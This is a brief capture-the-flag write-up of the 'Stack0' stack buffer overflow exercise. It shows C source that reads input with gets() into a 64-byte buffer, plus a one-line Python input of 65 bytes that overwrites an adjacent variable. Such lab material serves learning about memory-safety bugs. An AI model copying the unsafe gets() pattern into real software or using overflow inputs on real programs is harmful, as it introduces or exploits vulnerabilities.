# Stack0

## Source Code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
```

## Challenge

the challenge is to modify `modified` variable
clearly by looking at the source code it's a stack buffer overflow vulnerability
so clearly by providing an input bigger than 64 bytes we can overwrite the `modified` variable and hence i did that

`python -c "print 'A'*65" | ./stack0`

Voila! this challenge was completed